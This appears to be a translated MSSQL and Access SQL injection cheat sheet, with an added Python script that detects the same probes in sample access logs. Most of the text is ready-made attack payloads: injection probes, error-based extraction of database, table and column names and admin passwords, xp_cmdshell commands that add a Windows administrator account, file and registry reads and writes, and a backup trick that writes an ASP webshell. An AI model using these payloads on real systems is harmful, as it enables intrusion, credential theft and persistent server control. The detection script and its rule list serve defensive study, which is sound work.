1. Determine whether there is an injection point
   ; and 1=1
   ; and 1=2
2. Preliminary judgment of whether the database is MSSQL
   ; and user>0
3. Identify the database system
   ; and (select count(*) from sysobjects)>0     MSSQL
   ; and (select count(*) from msysobjects)>0    Access
4. When the injected parameter is a string
   ' and [query condition] and ''='
5. When a search parameter is not filtered
   ' and [query condition] and '%25'='
6. Guess the table name
   ; and (select count(*) from [table name])>0
7. Guess the field name
   ; and (select count([field name]) from [table name])>0
8. Guess the length of a record in the field
   ; and (select top 1 len([field name]) from [table name])>0
9. (1) Guess the ASCII value of a character in the field (Access)
   ; and (select top 1 asc(mid([field name],1,1)) from [table name])>0
   (2) Guess the ASCII value of a character in the field (MSSQL)
   ; and (select top 1 unicode(substring([field name],1,1)) from [table name])>0
10. Test the permission structure (MSSQL)
   ; and 1=(select IS_SRVROLEMEMBER('sysadmin')); --
   ; and 1=(select IS_SRVROLEMEMBER('serveradmin')); --
   ; and 1=(select IS_SRVROLEMEMBER('setupadmin')); --
   ; and 1=(select IS_SRVROLEMEMBER('securityadmin')); --
   ; and 1=(select IS_SRVROLEMEMBER('diskadmin')); --
   ; and 1=(select IS_SRVROLEMEMBER('bulkadmin')); --
   ; and 1=(select IS_MEMBER('db_owner')); --
11. Add an account to MSSQL and to the system
   ; exec master.dbo.sp_addlogin username; --
   ; exec master.dbo.sp_password null,username,password; --
   ; exec master.dbo.sp_addsrvrolemember sysadmin username; --
   ; exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add'; --
   ; exec master.dbo.xp_cmdshell 'net user username password /add'; --
   ; exec master.dbo.xp_cmdshell 'net localgroup administrators username /add'; --
12. (1) Traverse directories
   ; create table dirs(paths varchar(100), id int)
   ; insert dirs exec master.dbo.xp_dirtree 'c:\'
   ; and (select top 1 paths from dirs)>0
   ; and (select top 1 paths from dirs where paths not in('[path obtained in the previous step]'))>0
   (2) Traverse directories
   ; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)); --
   ; insert temp exec master.dbo.xp_availablemedia; --                              list all current drives
   ; insert into temp(id) exec master.dbo.xp_subdirs 'c:\'; --                      list the subdirectories
   ; insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\'; --                 directory tree of all subdirectories
   ; insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp'; --   read the contents of a file
13. Registry stored procedures in MSSQL
   xp_regenumvalues   root key, subkey
     exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
     returns all values under the key, as multiple record sets
   xp_regread   root key, subkey, value name
     exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'
     returns the data of the specified value
   xp_regwrite   root key, subkey, value name, value type, value
     there are two value types: REG_SZ for strings and REG_DWORD for integers
     exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName','reg_sz','hello'
     writes the value to the registry
   xp_regdeletevalue   root key, subkey, value name
     exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName'
     removes a value
   xp_regdeletekey   root key, subkey
     exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'
     removes the key together with all values under it
14. MSSQL backup used to create a webshell
   use model
   create table cmd(str image);
   insert into cmd(str) values ('<% Dim oScript %>');
   backup database model to disk='c:\l.asp';
15. MSSQL built-in functions
   ; and (select @@version)>0       exposes the SQL Server version string (which also names the Windows build)
   ; and user_name()='dbo'          tests whether the current connection is running as SA (dbo)
   ; and (select user_name())>0     exposes the user of the current connection
   ; and (select db_name())>0       exposes the currently connected database
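Every probe in the list above (the 1=1 / 1=2 pair, the sysobjects / msysobjects check, the IS_SRVROLEMEMBER calls, the xp_* and sp_* procedures, the backup-to-disk trick) leaves a distinctive string in the web server's access log, which is where a defender would look for this sequence. The following Python script is an added example, not part of the original notes: it scans constructed sample log lines (the SAMPLE_LOG text, the IP addresses, the request paths and the rule names are all made up here) for those signatures after URL-decoding the request target, and flags clients that triggered more than one rule family, since a single hit can be a false positive but the ordered sequence above is not.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (made up for this example; not from a real server).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news.asp?id=12%20and%201=1 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /news.asp?id=12%20and%201=2 HTTP/1.1" 200 318
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /news.asp?id=12%20and%20(select%20count(*)%20from%20sysobjects)>0 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /news.asp?id=12'having%201=1-- HTTP/1.1" 500 210
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /news.asp?id=12;exec%20master.dbo.xp_cmdshell%20'net%20user'-- HTTP/1.1" 500 210
10.0.0.7 - - [01/Jan/2024:10:00:07 +0000] "GET /search.asp?q=sysobjects%20tutorial HTTP/1.1" 200 4100
"""

# Common-log-format line: client IP first, request target between the method and "HTTP/".
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')

# Each rule is a label plus a pattern matched against the URL-decoded request target.
# The patterns mirror the probes listed in the notes above.
RULES = [
    ("boolean-probe", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("error-based-having", re.compile(r"\bhaving\s+1\s*=\s*1\b", re.I)),
    # Require a preceding FROM so that a plain search for the word "sysobjects" is not flagged.
    ("schema-enum", re.compile(
        r"\bfrom\s+(?:\w+\.dbo\.)?(?:sysobjects|msysobjects|sysdatabases|syscolumns)\b", re.I)),
    ("role-check", re.compile(r"\bis_(?:srvrole)?member\s*\(", re.I)),
    ("dangerous-proc", re.compile(
        r"\b(?:xp_cmdshell|xp_dirtree|xp_subdirs|xp_availablemedia|xp_reg\w+"
        r"|sp_addlogin|sp_password|sp_addsrvrolemember)\b", re.I)),
    ("backup-write", re.compile(r"\bbackup\s+database\b.*\bto\s+disk\b", re.I)),
]


def classify_request(target):
    """Return the labels of every rule the URL-decoded request target triggers."""
    decoded = unquote_plus(target)
    return [label for label, pattern in RULES if pattern.search(decoded)]


def scan(log_text):
    """Return (line_number, client_ip, labels) for each log line that triggers a rule."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        match = LOG_LINE.match(line)
        if not match:
            continue  # not a request line we understand; skip it
        client_ip, target = match.groups()
        labels = classify_request(target)
        if labels:
            hits.append((number, client_ip, labels))
    return hits


def suspicious_clients(log_text, min_rules=2):
    """Map client IP -> sorted rule labels for clients that tripped at least min_rules distinct rules."""
    seen = {}
    for _, client_ip, labels in scan(log_text):
        seen.setdefault(client_ip, set()).update(labels)
    return {ip: sorted(labels) for ip, labels in seen.items() if len(labels) >= min_rules}


if __name__ == "__main__":
    for number, client_ip, labels in scan(SAMPLE_LOG):
        print(f"line {number}: {client_ip} -> {', '.join(labels)}")
    print("suspicious clients:", suspicious_clients(SAMPLE_LOG))
```

On the sample data the script reports lines 2 to 6 and flags 10.0.0.9, which tripped four different rule families, while the innocent search for "sysobjects" on line 7 is not reported because no FROM precedes it. In a real deployment the same rules would be applied to the decoded query string and POST body rather than to the access log alone, since POST parameters are not logged there.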
MSSQL manual injection: exposing the database
1. Expose the current table name and column name
   Submit "'having 1=1--" after the injection point; the error message returned (in English) shows a table name and a column name. Then submit "group by [exposed column name] having 1=1--" to get the next column name, and continue with "group by [exposed table name].[first column name], [exposed table name].[second column name] having 1=1--" to get yet another column name. Keep submitting in the same way until the page no longer returns an error message; at that point all the column names have been obtained.
   Principle: the table and column names are exposed because GROUP BY is combined with HAVING as a condition in the SQL statement; since the statement is incomplete, the database returns an error message that displays a table name and a column name. This basic method can only expose the table used by the current query, and it becomes very laborious when that table has many columns.
2. Expose all database names
   Use the statement "and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=[N])" to expose the name of any database, where [N] is the Nth database. Step 1: after the injection point, submit "and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=12)". Because dbid values 1 to 5 are used by the system, user-created databases start at 6. We submitted name>1, but name is a character-type field, so comparing it with a number raises an error, and after submission IE returns: "Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'Northwind' to a column of data type int." The value of the name field is thus exposed: we have obtained the database name "Northwind". Changing the value of dbid yields all the database names.
   and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=[N])--    change N, starting from 6, to expose all database names
3. Expose all table names in a specified database
   With a database name in hand, get all the table names in that database by submitting "and 0<>(select top 1 name from master.dbo.sysobjects where xtype='U')". This asks for a table name in the master database: the query returns the value of name, which is then compared with the number 0, so the value of name is exposed by the conversion error. After submission a table named "spt_monito" was exposed. To expose the other tables, submit "and 0<>(select top 1 name from master.dbo.sysobjects where xtype='U' and name not in('spt_monito'))", which exposes another table, named "cd512". Keep submitting with "and name not in('spt_monito','cd512',...)" and all the table names can be found.
   and 0<>(select top 1 name from [database name].dbo.sysobjects where xtype='U')--
   and 0<>(select top 1 name from [database name].dbo.sysobjects where xtype='U' and name not in('[exposed table name]'))--
   and 0<>(select top 1 name from [database name].dbo.sysobjects where xtype='U' and name not in('[exposed table name]','[second exposed table name]'))--
4. Expose all column names in a specified table
   and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))
   Converting the id value to a character type and comparing it with an integer raises an error that exposes the object id of the table selected by name='[table name]'; here the id value is 949578421.
   and 0<>(select top 1 name from wutong.dbo.syscolumns where id=949578421)--    exposes one field name of the admin table
   Resubmit
   and 0<>(select top 1 name from wutong.dbo.syscolumns where id=949578421 and name not in('adduser'))--
   and continue with "and name not in('[first field name]','[second field name]',...)" to find all the field names in the admin table.
   General form:
   and 0<>(select count(*) from [database name].dbo.sysobjects where xtype='U' and name='[table whose fields are to be exposed]' and uid>(str(id)))--    exposes the id value of that table
   and 0<>(select top 1 name from [database name].dbo.syscolumns where id=[exposed id value])--    exposes one field name of the table with that id
   and 0<>(select top 1 name from [database name].dbo.syscolumns where id=[exposed id value] and name not in('[exposed field name]'))--
5. Read the data in a specified table
   and 0<(select A_ID from wutong.dbo.admin where A_UserID>1)--    the conversion error exposes the content of the column compared with 1 (A_UserID here)
   and 0<(select [an existing field] from [database name].dbo.[table to query] where [field whose content is to be exposed]>1)--
   and 0<(select A_ID from wutong.dbo.admin where A_PWD>1 and A_UserID='admin')--    exposes the password of admin
   and 0<(select top 1 A_UserID from admin where A_ID<>1)--    the administrator name whose id<>1 (fuhao)
   and 0<(select top 1 A_UserID from admin where A_ID<>1 and A_UserID<>'fuhao')--    the second administrator name, excluding fuhao (tuiguang)
   and 0<(select top 1 A_UserID from admin where A_ID<>1 and A_UserID<>'fuhao' and A_UserID<>'tuiguang')--
   Once the table and column names of the database are known, a query statement can read any information in it. For example, to read the Nth record of a column in a table, submit "and (select top 1 [column name] from [table name] where id=[N])>1" ([N] is the Nth record in the column); the desired data can then be read from the information IE returns.